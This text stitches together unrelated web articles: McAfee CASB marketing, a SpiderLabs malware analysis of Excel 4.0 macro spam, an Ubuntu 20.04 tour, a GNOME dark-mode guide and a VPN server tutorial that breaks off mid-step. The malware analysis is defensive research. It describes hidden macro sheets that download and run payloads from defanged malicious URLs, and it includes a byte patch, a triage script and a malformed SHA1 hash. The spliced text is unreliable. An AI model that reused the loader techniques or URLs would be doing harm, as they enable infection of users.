Top 3 Data Visualization Capabilities for the CASB Solution

In McAfee’s latest cloud and risk report, 52% of companies said they had the best security in the cloud.  As companies move their most sensitive data to the cloud, they are increasing their investment in CASB solutions to secure that data. Most security decisions generate large amounts of data, and security teams need to analyze this data to quickly obtain information and take corrective action. The visualization capabilities of the CASB solution play an important role in understanding the company’s position in cloud security.

MVISION Cloud customers have indicated that data visualization in CASB is very important to support their work. The difficulty for customers was that they did not have the time to export the data to external tools such as Excel and manipulate it to achieve the required visualization. By providing these capabilities as part of the CASB tool, security teams can save time and gain a better understanding of the security situation in the cloud.

With the latest version of MVISION Cloud, we’ve provided new and improved visualization capabilities to help customers get the information they need to make security decisions. These capabilities allow not only regular monitoring of key indicators, but also the sharing of this information with other stakeholders and security managers.

  1. Granular charting capabilities that provide in-depth information.

CASB offers a variety of statistics for cloud usage, including the number of users, the amount of data uploaded, the number of requests, incoming/outgoing data and authorized/refused requests, DLP incidents, threats, anomalies and more. By providing the right visualization, customers can analyze the data more effectively, perform the necessary analyses and take corrective action. For example, a security administrator may want to understand the top ten categories of cloud services based on the download volume.

Visualisation of services and risks using multiple dimensions

Once this table is available, they may want to understand in detail how many services in these categories have been associated with high, medium or low risk, allowing them to narrow down the categories in which users download most data on high-risk services. Another example is understanding the number of Office 365 DLP incidents produced by the company’s services. For each of these services, the administrator may determine the severity of the incidents. Multi-dimensional visualization is the key to analyzing the use of the enterprise cloud to get a quick overview.

  2. Performance monitoring using dashboard maps

Once the CASB administrator has created the required diagrams, they will want to check them regularly. With MVISION Cloud, customers can view their charts on a customizable dashboard, allowing them to explore variations in key statistics. An example of this is a large financial services customer that wants to monitor IaaS resource indicators on a regular basis. This can be a list of AWS, Azure and GCP sources in the organization, a list of sources that do not meet security requirements, or the number of unresolved incidents in the security configuration.

Dashboard for monitoring IaaS security measures

  3. Share visual information with stakeholders through reports.

Security administrators using CASB solutions work with various stakeholders, including senior management, helpdesk and IT departments, to keep them up to date on key security indicators for the cloud. While most solutions allow periodic export of data to spreadsheets, the ability to export a complete dashboard as a calendar report makes the information much more consumable. An example is the dashboard that shows the most important security measures of Microsoft Office 365, such as unresolved incidents by severity.

Report of Office 365 DLP incidents by severity.

As more and more business functions are moved to the cloud, customers now use cloud-based security solutions to protect all their online resources from web traffic, online services, IaaS and container resources. The ability to clearly visualize security measures and obtain the necessary information and fixes is essential to ensure the continuity of asset security in the cloud. While this includes many components and approaches, rich visualization capabilities such as MVISION Cloud help you make the most of your CASB solution and secure your company’s cloud resources.

Excel 4.0 Macro MalSpam Campaigns (SpiderLabs)

Following the recent blog post by my colleague Rodel Mendrez, we looked at last month’s spam using Excel 4.0 macros and found some interesting examples. Both campaigns use a fake invoice theme, and both use an Excel 4.0 macro to download malicious executables.

Example 1: Hidden Excel 4.0 macro sheet with a formula downloaded via web query

Figure 1: Trustwave Security Email Gateway (SEG) displaying the first Excel 4.0 spam sample.

The first spam campaign carries an archive containing a fake invoice, new_Invoice 0962.xls. Since the fake invoice is an Excel file that follows the Compound File Binary Format (CFBF), we can extract its streams with 7-Zip to get more information for static analysis of the attachment.

Figure 2: DocumentSummaryInformation stream of the attachment new_Invoice 0962.xls, obtained with 7-Zip

The DocumentSummaryInformation stream indicates that the attachment contains an Excel 4.0 macro. The Excel file consists of 2 sheets: Sheet1 and 8XoaRgSmhZwAxAOJuv2a. In addition, Sheet1 contains a named cell or range of cells called SzpmQrOQqq4E98Rm40RZ7.

When displaying the Workbook stream, two strings indicate a connection to an external data source: the string Connection and the URL hxxps://emmnebuc[.]xyz/SDVJKBsdkhv1.

Figure 3: The Workbook stream from Figure 2, viewed in Hiew

The Workbook stream follows the Binary Interchange File Format (BIFF) specification. Using the BiffView tool, we check the BIFF records in the attachment new_Invoice 0962.xls and focus on the records related to the above observations: BOUNDSHEET and DCONN.

There are two BIFF BOUNDSHEET records in the attachment that contain information about the sheets. The first record is for Sheet1, a visible worksheet, and the second record is for 8XoaRgSmhZwAxAOJuv2a, a hidden Excel 4.0 macro sheet.

Figure 4: The BIFF BOUNDSHEET records of new_Invoice 0962.xls

The BIFF DCONN record stores information about data connections. The file new_Invoice 0962.xls has a DCONN record, which indicates that Excel will execute a web query named Connection, tied to the Excel object Sheet1!SzpmQrOQqq4E98Rm40RZ7.

Figure 5: BIFF DCONN record of the Excel attachment

With these details about new_Invoice 0962.xls, we can now examine the macro and the data connection in Microsoft Excel.

Figure 6: The Unhide option for Sheet1 is enabled when there is a hidden sheet.

The Name Manager on Excel’s Formulas tab lists 5 defined names. The first 4 are defined names for cells of the hidden sheet 8XoaRgSmhZwAxAOJuv2a. The first defined name, Auto_Open, serves as the autostart for the formulas in the macro sheet. The fifth name refers to a cell range on Sheet1 and is the Excel object used by the web query.

Figure 7: The Excel object linked to the data connection

Once the data connection is enabled, the web query is executed immediately and its return value is placed in Sheet1!$Y$100:$Y$103, the cell range to which the fifth defined name refers.

Figure 8: The formula is loaded after the data connection is enabled.

The formula obtained via the web query contains Excel 4.0 macro functions and therefore does not work in Sheet1. When macros are enabled, it is copied to and finally executed on the Excel 4.0 macro sheet.

Figure 9: FORMULA.FILL executes the loaded formula on the Excel 4.0 macro sheet.

The downloaded formula serves as a loader for the second stage. It downloads a DLL from hxxps://emmnebuc[.]xyz/SDKVJBsaduv7, saves it as an html file in the %public% directory and executes it. At the time of writing, the URL is unfortunately no longer available.

Example 2: Very hidden Excel 4.0 macro sheet downloads a binary

Figure 9: SEG displaying the second fake invoice spam

In the second spam sample, meanwhile, the Excel file is attached directly to the e-mail. With BiffView, we checked whether Rechnung_372571.xls contains an Excel 4.0 macro.

Figure 10: The BIFF BOUNDSHEET records of Rechnung_372571.xls, obtained with BiffView.

As with the first spam sample, the malicious behavior lives in an Excel 4.0 macro sheet. The macro sheet has the very hidden property, so it does not appear in the Unhide dialog. To display the macro sheet, you must modify its BIFF BOUNDSHEET record: the fifth byte of the first record in Figure 10 changes from 02:00 to 00:00.
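The BOUNDSHEET and DCONN checks described for both samples can be automated. The following triage script is an added example, not code from the original article or from BiffView; it assumes BIFF8 record layout, takes an already extracted Workbook stream as bytes, and runs here on constructed sample streams that only borrow the sheet names mentioned in the text.

```python
import struct

# BIFF8 record identifiers for the two record types discussed above.
BOUNDSHEET = 0x0085  # one per sheet: stream offset, visibility, type, name
DCONN = 0x0876       # data connection, e.g. a web query
MACRO_SHEET = 0x01   # sheet type value for an Excel 4.0 macro sheet
VISIBILITY = {0: "visible", 1: "hidden", 2: "very hidden"}


def iter_records(stream):
    """Yield (offset, record_type, body) for each record in a Workbook stream."""
    pos = 0
    while pos + 4 <= len(stream):
        rtype, rlen = struct.unpack_from("<HH", stream, pos)
        body = stream[pos + 4:pos + 4 + rlen]
        if len(body) < rlen:
            break  # truncated record: stop instead of misparsing
        yield pos, rtype, body
        pos += 4 + rlen


def parse_boundsheet(body):
    """Decode a BOUNDSHEET body: 4-byte offset, state, type, short string name."""
    if len(body) < 8:
        raise ValueError("BOUNDSHEET body too short")
    state = body[4] & 0x03      # fifth byte: 0 visible, 1 hidden, 2 very hidden
    sheet_type = body[5]
    cch, flags = body[6], body[7]
    if flags & 0x01:            # high-byte flag set: UTF-16LE characters
        name = body[8:8 + 2 * cch].decode("utf-16-le", "replace")
    else:                       # compressed: one byte per character
        name = body[8:8 + cch].decode("latin-1")
    return {"name": name, "state": state, "type": sheet_type}


def triage(stream):
    """Return (sheets, dconn_count, findings) for a Workbook stream."""
    sheets, dconn_count, findings = [], 0, []
    for _, rtype, body in iter_records(stream):
        if rtype == BOUNDSHEET:
            sheets.append(parse_boundsheet(body))
        elif rtype == DCONN:
            dconn_count += 1
    for sheet in sheets:
        if sheet["type"] == MACRO_SHEET and sheet["state"] != 0:
            findings.append("%s Excel 4.0 macro sheet: %s"
                            % (VISIBILITY.get(sheet["state"], "unknown"), sheet["name"]))
    if dconn_count:
        findings.append("%d data connection record(s) (DCONN)" % dconn_count)
    return sheets, dconn_count, findings


def unhide_all(stream):
    """Return a copy with every sheet set to visible, for inspection in Excel."""
    patched = bytearray(stream)
    for pos, rtype, body in iter_records(stream):
        if rtype == BOUNDSHEET and len(body) >= 5:
            patched[pos + 4 + 4] &= 0xFC  # clear the two visibility bits
    return bytes(patched)


# --- Constructed sample data (not taken from the real attachments) ---
def _record(rtype, body):
    return struct.pack("<HH", rtype, len(body)) + body


def _boundsheet(name, state, sheet_type):
    raw = name.encode("latin-1")
    header = struct.pack("<IBBBB", 0, state, sheet_type, len(raw), 0)
    return _record(BOUNDSHEET, header + raw)


BOF, EOF = _record(0x0809, b"\x00" * 16), _record(0x000A, b"")
# Shape of example 1: visible worksheet, hidden macro sheet, one data connection.
SAMPLE_1 = (BOF + _boundsheet("Sheet1", 0, 0)
            + _boundsheet("8XoaRgSmhZwAxAOJuv2a", 1, MACRO_SHEET)
            + _record(DCONN, b"\x00" * 12) + EOF)
# Shape of example 2: one very hidden macro sheet (name borrowed from the
# cell reference quoted in the text).
SAMPLE_2 = BOF + _boundsheet("sygfdesy", 2, MACRO_SHEET) + EOF

if __name__ == "__main__":
    for label, sample in (("sample 1", SAMPLE_1), ("sample 2", SAMPLE_2)):
        for finding in triage(sample)[2]:
            print(label, "->", finding)
```

To use it on a real file, extract the Workbook stream first (for example with 7-Zip, as above) and pass its bytes to `triage`; write the output of `unhide_all` only to an analysis copy.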

Figure 11: The modified file Rechnung_372571.xls, with the Name Manager showing only one defined name. Clicking the Auto_Open reference leads to the macro sheet that was originally very hidden.

The macro sheet contains a series of RUN functions that start at the cell referenced by Auto_Open and lead to the execution of the formula at sygfdesy!$CY$375. Rechnung_372571.xls downloads hxxp://paypeted[.]com/esdfrtDERGTYuicvbnTYUv/gspqm[.]exe and runs it under the name C:Intelsgift.exe.

Figure 12: Excel 4.0 macro execution sequence leading to the binary

Conclusion

Excel 4.0 macros were introduced almost 28 years ago, and only a year after their introduction they were overshadowed by VBA, introduced in Excel 5.0. Recently, however, we have noticed that malware writers are making increasing use of this feature, which is still supported in Excel.

Malicious Excel 4.0 macros are more difficult to analyze and detect than VBA macros. VBA macros have their own dedicated streams, while Excel 4.0 macros are stored in BIFF records in the Workbook stream.

Note that these threats will not work if macros are disabled in the Trust Center settings, just like VBA macros. So if you are not sure about the file and its source, do not enable macros.

IOC

new_Invoice 0962.xls (185344 bytes) SHA1 : 16476552B017B61C01152D624F038BBE895E52EE
Rechnung_372571.xls (65024 bytes) SHA1 : 96 AE371021192490B5DA7911329ED2DBC837D

Discover Ubuntu 20.04 LTS in 20 Screenshots

Here’s an easy way to sample the changes included in Ubuntu 20.04 without the hassle of having to download and install the distro first!

I went on a screen-snapping spree in a fresh copy of the OS to collate the following collection of screenshots that showcase some of the visible end-user changes in Focal Fossa.

Think of this post as a pack of pre-install spoilers crossed with some pragmatic pre-install promotion.

Dive in and take a look!

Ubuntu 20.04 in Screenshots

We start at the Ubiquity installer which, few will be surprised to hear, hasn’t changed dramatically for eons… or is that Eoans?

That said there are a clutch of updated screenshots and rewritten info blurbs, both aimed at letting users know a bit more about the system they’re in the process of installing…

Ubuntu 20.04 Installer Screenshot Ubuntu installer

Once the Ubuntu install completes, and the user reboots as prompted, they’ll be delivered to the revamped login screen which, in this release, boasts a cleaner overall layout:

The password entry box is now neatly aligned with the user pod, and the ability to ‘password peek’ added. Notably, the session switcher menu has moved to the lower right corner of the screen:

Login Screen The new Ubuntu login screen

The first time anyone logs in to the Ubuntu desktop they are greeted by the welcome wizard. No new pages or options have been added to what previously existed, but the tool remains a solid primer all the same:

Ubuntu 20.04 screenshot: first run wizard. Ubuntu’s welcome tool

Ubuntu 20.04 has a clean and minimal desktop. Only icons for Home and Trash folders are displayed by default (and can be hidden). The Top Bar and Ubuntu Dock neatly frame the brand new ‘Focal Fossa’ mascot wallpaper:

The Ubuntu 20.04 LTS Desktop

Revised versions of Ubuntu’s Yaru GTK and GNOME Shell themes feature, both rebased on upstream versions in Adwaita and GNOME Shell. Eagle-eyed users may spot the odd dash of purple that’s now peppered throughout the UI:

Ubuntu 20.04 screenshot showing purple accents in the UI Yaru theme tweaks

Calendar widget and app notification banners sport a raised, carded look in the Notification Center/message tray applet, a change that really helps lift (pun intended) the overall aesthetic:

Ubuntu 20.04 screenshot showing app notification Carded-effect notifications and widgets

Sticking with theme changes for a moment there’s a brand new “dark mode” option available in the Settings > Appearance panel.

Ubuntu 20.04 screenshot showing dark mode New dark mode option

GNOME developers have tweaked the layout of “Authentication Required” dialogs (among others) to improve consistency throughout the UI, i.e. centrally aligned elements, password peek toggle etc:

Ubuntu 20.04 screenshot showing authentication dialog Authentication dialog in Focal

The ability to create custom app folders using drag and drop in the Applications grid was introduced in Ubuntu 19.10 and GNOME 3.34 — but the feature is much improved in this release.

App folders now spawn predictably from the centre of the screen; the icon shuffling animation is less flaky; and it’s easier to edit folder names directly from the folder itself:

Ubuntu 20.04 screenshot showing app folders A custom app folder

Search results displayed in the Applications screen are now easier to read, and are grouped by source:

Search results grouped by source

Those rocking high-resolution displays can enable fractional scaling in Ubuntu 20.04 using the new toggle present in the Settings > Display panel:

Display Settings Fractional scaling options in Focal

Sticking with Settings for a moment, users may appreciate the newly redesigned “About” panel (though may not appreciate the fact that this no longer shows the kernel version):

GNOME 3.36 features a redesigned About pane

Ubuntu’s lock screen no longer requires users to set a separate background for it. Instead the lock screen reuses the desktop wallpaper with a heavy blur applied to it:

Ubuntu 20.04 Screenshot: new lock The new lock screen

There are no major software additions in Ubuntu 20.04 beyond a Snap’d version of Ubuntu Software by default (but those who want to install Flatpak apps will need to install the repo version instead):

ubuntu 20.04 has a new Snap Ubuntu Software app Snap’d Ubuntu Software

Snap versions of Calculator, Characters, and Logs have been removed from the default install and replaced with the respective repo versions:

ubuntu 20.04 characters and logs applications The Logs and Characters apps

The latest versions of Mozilla Firefox, LibreOffice, and Thunderbird come as standard:

ubuntu 20.04 firefox libreoffice app screenshot Firefox 75 and LibreOffice 6.4

And there are new versions of other core open source apps, like Calendar, To-Do and the Shotwell photo manager:

ubuntu 20.04 Shotwell, calendar and To do app screenshot Shotwell, Calendar and the To Do app

GNOME 3.36, around which Ubuntu 20.04 LTS sits, does deliver a new “Suspend” option in the Status Menu:

ubuntu 20.04 screenshot showing the new suspend option Visible suspend option

Finally, the power off dialog (like other dialogs in this release) is now centre-aligned:

ubuntu 20.04 screenshot showing power dialog in gnome shell C YA

How to Enable Full Dark Mode for Ubuntu 20.04 LTS

Ubuntu 20.04 ships with a new dark theme option, but some users don’t think the feature goes far enough.

So in this guide I show you how to change the GNOME Shell theme in Ubuntu 20.04 LTS to Yaru Dark. This simple step gives you a more complete ‘dark mode’ experience throughout the whole Ubuntu desktop UI.

But why is a tutorial on this needed at all?

Well…

Ubuntu’s New Dark Theme

As you probably know by now, Ubuntu 20.04 makes it very easy to change the look and feel of “window colours” directly from the Settings > Appearance app.

Three window colour choices are offered here: light, standard, and dark:

It’s a great feature, one I was particularly pleased to see Ubuntu add.

The “problem” stems from the fact that the new ‘Dark’ setting only changes the look and feel of apps that run on the desktop. It does not change the colour of the desktop UI itself.

Instead, the GNOME Shell UI continues to use a light theme, regardless of which window colour preference you’ve picked:

Ubuntu Dark theme but light shell

It doesn’t look terrible but it’s not quite the full dark theme experience that some users are after.

So I’m pleased to say you can change it — and here’s how.

How to Make GNOME Shell Dark in 20.04

First, you’re going to need to install the User Themes GNOME Shell extension. This add-on lets you change the GNOME Shell theme incredibly easily.

You can install this particular power-up from the extensions.gnome.org (EGO) website but I find it quicker to just install the gnome-shell-extensions package (warning: it adds lots of other add-ons too) straight from the Ubuntu archives, no browser required:

Click to the GNOME Extensions Bundle

Alternatively, you can run this command to install the User Themes GNOME extension on Ubuntu from the command line:

sudo apt install gnome-shell-extensions

Whatever way you choose to install the User Themes extension you are going to need both the (new) GNOME Extensions app and GNOME Tweaks to take advantage of it:

Click to install GNOME Tweaks on Ubuntu

Click to install GNOME Extensions App on Ubuntu

I don’t have a fresh install to test but it might be the case that the ‘new’ Extensions preferences app doesn’t need to be installed manually. It might be enabled as soon as you install an extension — just look for it in the Applications grid:

Now you’re all set!

  • Open GNOME Extensions app
  • Slide the toggle next to ‘User Themes’ to on (coloured)

Just like in this picture:

Enable User Themes Extension

Then you need to log out and back in to your session OR manually restart GNOME Shell (Alt + F2, type r, hit enter) for the theming extension to actually be activated.

Lastly, open the GNOME Tweaks tool and:

  • Select ‘Appearance’ in the sidebar
  • Locate the Shell section
  • Select ‘Yaru Dark’ from the menu adjacent

Refer to this screenshot if you need help:

Enable Yaru Dark theme in GNOME Tweaks

That’s all you need to do. Your desktop is now fully dark in ALL areas!

full dark mode

If you get bored of the dark look — impossible, trust me — and want to switch back to the standard ‘light’ look for GNOME Shell UI elements just repeat the last set of steps again, but choose ‘Default’ in place of ‘Yaru Dark’.

Do you prefer light or dark Shell themes? Let me know below

Thanks to everyone who sent this tip in

Set Up OpenConnect VPN Server (ocserv) on Ubuntu 20.04 with Let’s Encrypt

This tutorial is going to show you how to run your own VPN server by installing OpenConnect VPN server on Ubuntu 20.04. OpenConnect VPN server, aka ocserv, is an open-source implementation of the Cisco AnyConnect VPN protocol, which is widely used in businesses and universities. AnyConnect is an SSL-based VPN protocol that allows individual users to connect to a remote network.

Why Set Up Your Own VPN Server?

  • Maybe you are a VPN service provider or a system administrator, which behooves you to set up your own VPN server.
  • You don’t trust the no-logging policy of VPN service providers, so you go the self-host route.
  • You can use VPN to implement network security policy. For example, if you run your own email server, you can require users to log in only from the IP address of the VPN server by creating an IP address whitelist in the firewall. Thus, your email server is hardened to prevent hacking activities.
  • Perhaps you are just curious to know how VPN server works.

Set Up OpenConnect VPN Server (ocserv) on Ubuntu 20.04

Features of OpenConnect VPN Server

  • Lightweight and fast. In my test, I can watch YouTube 4K videos with OpenConnect VPN. YouTube is blocked in my country (China).
  • Runs on Linux and most BSD servers.
  • Compatible with Cisco AnyConnect client
  • There is OpenConnect client software for Linux, macOS, Windows and OpenWRT. For Android and iOS, you can use the Cisco AnyConnect Client.
  • Supports password authentication and certificate authentication
  • Supports RADIUS accounting.
  • Easy to set up

I particularly like the fact that compared to other VPN technologies, it is very easy and convenient for the end-user to use OpenConnect VPN. Whenever I install a Linux distro on my computer and want to quickly unblock websites or hide my IP address, I install OpenConnect client and connect to the server with just two lines of commands:

sudo apt install openconnect

sudo openconnect -b vpn.mydomain.com

There is also OpenConnect VPN client for Fedora, RHEL, CentOS, Arch Linux and OpenSUSE. You can easily install it with your package manager.

sudo dnf install openconnect
sudo yum install openconnect
sudo pacman -S openconnect

Prerequisites

To follow this tutorial, you will need a VPS (Virtual Private Server) that can access blocked websites freely (Outside of your country or Internet filtering system). I recommend Vultr VPS (This is my referral link. You can get $50 free credit by creating an account at Vultr via my referral link). They offer 512M memory high-performance KVM VPS for just $2.5 per month, which is perfect for your private VPN server. Once you have a VPS, install Ubuntu 20.04 on it and follow the instructions below.

You also need a domain name. I registered my domain name from NameCheap because the price is low and they give whois privacy protection free for life.

Update: The new Vultr $2.5/month plan includes IPv6 address only. You can select the $3.5/month plan at the New York (NJ) data center to have both IPv4 and IPv6 addresses.

Step 1: Install OpenConnect VPN Server on Ubuntu 20.04

Log into your Ubuntu 20.04 server. Then use apt to install the ocserv package from the default Ubuntu repository.

sudo apt update
sudo apt install ocserv

Once installed, the OpenConnect VPN server is automatically started. You can check its status with:

systemctl status ocserv

Sample output:

● ocserv.service – OpenConnect SSL VPN server
Loaded: loaded (/lib/systemd/system/ocserv.service; enabled; vendor preset: enabled)
Active: active (running) since Sun 2020-04-12 19:57:08 HKT; 12s ago
Docs: man:ocserv(8)
Main PID: 216409 (ocserv-main)
Tasks: 2 (limit: 9451)
Memory: 1.6M
CGroup: /system.slice/ocserv.service
├─216409 ocserv-main
└─216429 ocserv-sm

Hint: If the above command doesn’t quit immediately, you can press the Q key to gain back control of the terminal.

If it’s not running, then you can start it with:

sudo systemctl start ocserv

By default OpenConnect VPN server listens on TCP and UDP port 443. If it’s being used by web server, then the VPN server would probably fail to start. We will see how to change the port in OpenConnect VPN configuration file later.

If there’s a firewall running on your server, then you will need to open port 80 and 443. For example, if you use UFW, then run the following command.

sudo ufw allow 80,443/tcp

Step 2: Install Let’s Encrypt Client (Certbot) on Ubuntu 20.04 Server

The gnutls-bin package installed along with ocserv provides tools to create your own CA and server certificate, but we will obtain and install Let’s Encrypt certificate. The advantage of using Let’s Encrypt certificate is that it’s free, easier to set up and trusted by VPN client software.

Run the following commands to install Let’s Encrypt client (certbot) from the default Ubuntu repository.

sudo apt install certbot

To check the version number, run

certbot --version

Sample output:

certbot 0.40.0

Step 3: Obtain a Trusted TLS Certificate from Let’s Encrypt

I recommend using the standalone or webroot plugin to obtain TLS certificate for ocserv.

Standalone Plugin

If there’s no web server running on your Ubuntu 20.04 server and you want OpenConnect VPN server to use port 443, then you can use the standalone plugin to obtain TLS certificate from Let’s Encrypt. Run the following command. Don’t forget to set A record for your domain name.

sudo certbot certonly --standalone --preferred-challenges http --agree-tos --email you@example.com -d vpn.example.com

Where:

  • certonly: Obtain a certificate but don’t install it.
  • --standalone: Use the standalone plugin to obtain a certificate.
  • --preferred-challenges http: Perform http-01 challenge to validate our domain, which will use port 80.
  • --agree-tos: Agree to Let’s Encrypt terms of service.
  • --email: Email address is used for account registration and recovery.
  • -d: Specify your domain name.

As you can see from the following screenshot, I successfully obtained the certificate.

ocserv ubuntu 20.04 letsencrypt certbot

Using webroot Plugin

If your Ubuntu 20.04 server has a web server listening on port 80 and 443, then it’s a good idea to use the webroot plugin to obtain a certificate because the webroot plugin works with pretty much every web server and we don’t need to install the certificate in the web server.

First, you need to create a virtual host for vpn.example.com.

Apache

If you are using Apache, then

sudo nano /etc/apache2/sites-available/vpn.example.com.conf

And paste the following lines into the file.

<VirtualHost *:80>
        ServerName vpn.example.com

        DocumentRoot /var/www/ocserv
</VirtualHost>

Save and close the file. Then create the web root directory.

sudo mkdir /var/www/ocserv

Set www-data (Apache user) as the owner of the web root.

sudo chown www-data:www-data /var/www/ocserv -R

Enable this virtual host.

sudo a2ensite vpn.example.com

Reload Apache for the changes to take effect.

sudo systemctl reload apache2

Once virtual host is created and enabled, run the following command to obtain Let’s Encrypt certificate using webroot plugin.

sudo certbot certonly --webroot --agree-tos --email you@example.com -d vpn.example.com -w /var/www/ocserv

Nginx

If you are using Nginx, then

sudo nano /etc/nginx/conf.d/vpn.example.com.conf

Paste the following lines into the file.

server {
    listen 80;
    server_name vpn.example.com;

    root /var/www/ocserv/;

    location ~ /.well-known/acme-challenge {
        allow all;
    }
}

Save and close the file. Then create the web root directory.

sudo mkdir -p /var/www/ocserv

Set www-data (Nginx user) as the owner of the web root.

sudo chown www-data:www-data /var/www/ocserv -R

Reload Nginx for the changes to take effect.

sudo systemctl reload nginx

Once virtual host is created and enabled, run the following command to obtain Let’s Encrypt certificate using webroot plugin.

sudo certbot certonly --webroot --agree-tos --email you@example.com -d vpn.example.com -w /var/www/ocserv

Step 4: Edit OpenConnect VPN Server Configuration File

Edit ocserv main configuration file.

sudo nano /etc/ocserv/ocserv.conf

First, we need to configure password authentication. By default, password authentication through PAM (Pluggable Authentication Modules) is enabled, which allows you to use Ubuntu system accounts to login from VPN clients. This behavior can be disabled by commenting out the following line.

auth = "pam[gid-min=1000]"

If we want users to use separate VPN accounts instead of system accounts to login, we need to add the following line to enable password authentication with a password file.

auth = "plain[passwd=/etc/ocserv/ocpasswd]"

After finishing editing this config file, we will see how to use ocpasswd tool to generate the /etc/ocserv/ocpasswd file, which contains a list of usernames and encoded passwords.

Note: Ocserv supports client certificate authentication, but Let’s Encrypt does not issue client certificate. You need to set up your own CA to issue client certificate.

Next, if you don’t want ocserv to use TCP and UDP port 443, then find the following two lines and change the port number. Otherwise leave them alone.

tcp-port = 443
udp-port = 443

Then find the following two lines. We need to change them.

server-cert = /etc/ssl/certs/ssl-cert-snakeoil.pem
server-key = /etc/ssl/private/ssl-cert-snakeoil.key

Replace the default setting with the path of Let’s Encrypt server certificate and server key file.

server-cert = /etc/letsencrypt/live/vpn.example.com/fullchain.pem
server-key = /etc/letsencrypt/live/vpn.example.com/privkey.pem

Then, set the maximal number of clients. Default is 128. Set to zero for unlimited.

max-clients = 128

Set the number of devices a user is able to login from at the same time. Default is 2. Set to zero for unlimited.

max-same-clients = 2

Next, find the following line. Change false to true to enable MTU discovery, which can optimize VPN performance.

try-mtu-discovery = false

You can set the time that a client is allowed to stay idle before being disconnected via the following two parameters. If you prefer the client to stay connected indefinitely, then comment out these two parameters.

idle-timeout=1200
mobile-idle-timeout=1800

After that, set the default domain to vpn.example.com.

default-domain = vpn.example.com

The IPv4 network configuration is as follows by default. This will cause problems because many home routers also set the IPv4 network range to 192.168.1.0/24.

ipv4-network = 192.168.1.0
ipv4-netmask = 255.255.255.0

We can use another private IP address range (10.10.10.0/24) to avoid IP address collision, so change the value of ipv4-network to

ipv4-network = 10.10.10.0

Now uncomment the following line to tunnel all DNS queries via the VPN.

tunnel-all-dns = true

The default DNS resolver addresses are as follows, which is fine.

dns = 8.8.8.8
dns = 1.1.1.1

Note: If you are a VPN service provider, then it’s a good practice to run your own DNS resolver on the same server. If there’s a DNS resolver running on the same server, then specify the DNS as

dns = 10.10.10.1

10.10.10.1 is the IP address of OpenConnect VPN server in the VPN LAN. This will speed up DNS lookups a little bit for clients because the network latency between the VPN server and the DNS resolver is eliminated.

Then comment out all the route parameters (add # symbol at the beginning of the following four lines), which will set the server as the default gateway for the clients.

route = 10.0.0.0/8
route = 172.16.0.0/12
route = 192.168.0.0/16

no-route = 192.168.5.0/255.255.255.0

Save and close the file. Then restart the VPN server for the changes to take effect.

sudo systemctl restart ocserv
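The Step 4 edits can be checked mechanically before restarting the service. The script below is an added example, not part of the original tutorial or of ocserv; the finding texts, the `HOME_LAN` constant and the two sample configurations (built from the lines quoted in Step 4) are this example's own.

```python
import ipaddress

HOME_LAN = ipaddress.ip_network("192.168.1.0/24")  # range many home routers use
CURLY_QUOTES = "\u201c\u201d\u2018\u2019"            # typographic quotes from web pages


def parse_conf(text):
    """Return {key: [values]} for active lines; keys such as dns or route repeat."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue                            # blank or commented-out line
        key, sep, value = line.partition("=")   # split at the first '=' only
        if sep:
            conf.setdefault(key.strip(), []).append(value.strip())
    return conf


def audit(text):
    """Return a list of (key, problem) pairs for the settings changed in Step 4."""
    conf, findings = parse_conf(text), []
    for key, values in conf.items():
        for value in values:
            if any(q in value for q in CURLY_QUOTES):
                findings.append((key, "typographic quotes pasted from a web page"))
    for value in conf.get("auth", []):
        if value.strip('"').startswith("pam"):
            findings.append(("auth", "PAM enabled: system accounts can log in over the VPN"))
    for key in ("server-cert", "server-key"):
        for value in conf.get(key, []):
            if "snakeoil" in value:
                findings.append((key, "default self-signed certificate still in use"))
    network = conf.get("ipv4-network", [""])[-1]
    netmask = conf.get("ipv4-netmask", ["255.255.255.0"])[-1]
    if network:
        cidr = network if "/" in network else "%s/%s" % (network, netmask)
        try:
            if ipaddress.ip_network(cidr, strict=False).overlaps(HOME_LAN):
                findings.append(("ipv4-network", "overlaps 192.168.1.0/24 used by home routers"))
        except (ValueError, TypeError):
            findings.append(("ipv4-network", "not a valid IPv4 network"))
    if conf.get("tunnel-all-dns", ["false"])[-1] != "true":
        findings.append(("tunnel-all-dns", "DNS queries are not forced through the tunnel"))
    for key in ("route", "no-route"):
        if key in conf:
            findings.append((key, "still active: server is not the clients' default gateway"))
    return findings


# Constructed samples: the default lines quoted in Step 4, then the edited result.
DEFAULT_CONF = """\
auth = "pam[gid-min=1000]"
tcp-port = 443
udp-port = 443
server-cert = /etc/ssl/certs/ssl-cert-snakeoil.pem
server-key = /etc/ssl/private/ssl-cert-snakeoil.key
ipv4-network = 192.168.1.0
ipv4-netmask = 255.255.255.0
#tunnel-all-dns = true
dns = 8.8.8.8
route = 10.0.0.0/8
route = 172.16.0.0/12
route = 192.168.0.0/16
no-route = 192.168.5.0/255.255.255.0
"""

TUTORIAL_CONF = """\
#auth = "pam[gid-min=1000]"
auth = "plain[passwd=/etc/ocserv/ocpasswd]"
tcp-port = 443
udp-port = 443
server-cert = /etc/letsencrypt/live/vpn.example.com/fullchain.pem
server-key = /etc/letsencrypt/live/vpn.example.com/privkey.pem
ipv4-network = 10.10.10.0
ipv4-netmask = 255.255.255.0
tunnel-all-dns = true
dns = 8.8.8.8
dns = 1.1.1.1
#route = 10.0.0.0/8
#no-route = 192.168.5.0/255.255.255.0
"""

if __name__ == "__main__":
    for key, problem in audit(DEFAULT_CONF):
        print("%-16s %s" % (key, problem))
```

To check a live server, pass the contents of /etc/ocserv/ocserv.conf to `audit`; an empty list means every Step 4 change is in place.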

Step 5: Create VPN Accounts

Now use the ocpasswd tool to generate VPN accounts.

sudo ocpasswd -c /etc/ocserv/ocpasswd username

You will be asked to set a password for the user and the information will be saved to /etc/ocserv/ocpasswd file. To reset password, simply run the above command again.

Step 6: Enable IP Forwarding

In order for the VPN server to route packets between VPN clients and the Internet, we need to enable IP forwarding. Edit sysctl.conf file.

sudo nano /etc/sysctl.conf

Add the following line at the end of this file.

net.ipv4.ip_forward = 1

Save and close the file. Then apply the changes with the below command. The -p option will load sysctl settings from /etc/sysctl.conf file. This command will preserve our changes across system reboots.

sudo sysctl -p

Step 7: Configure IP Masquerading in Firewall

We need to set up IP masquerading in the server firewall, so that the server becomes a virtual router for VPN clients. I will use UFW, which is a front end to the iptables firewall. Install UFW on Ubuntu with:

sudo apt install ufw

First, you need to allow SSH traffic.

sudo ufw allow 22/tcp

Then edit /etc/default/ufw file.

sudo nano /etc/default/ufw

Change the default forward policy from “DROP” to “ACCEPT”.

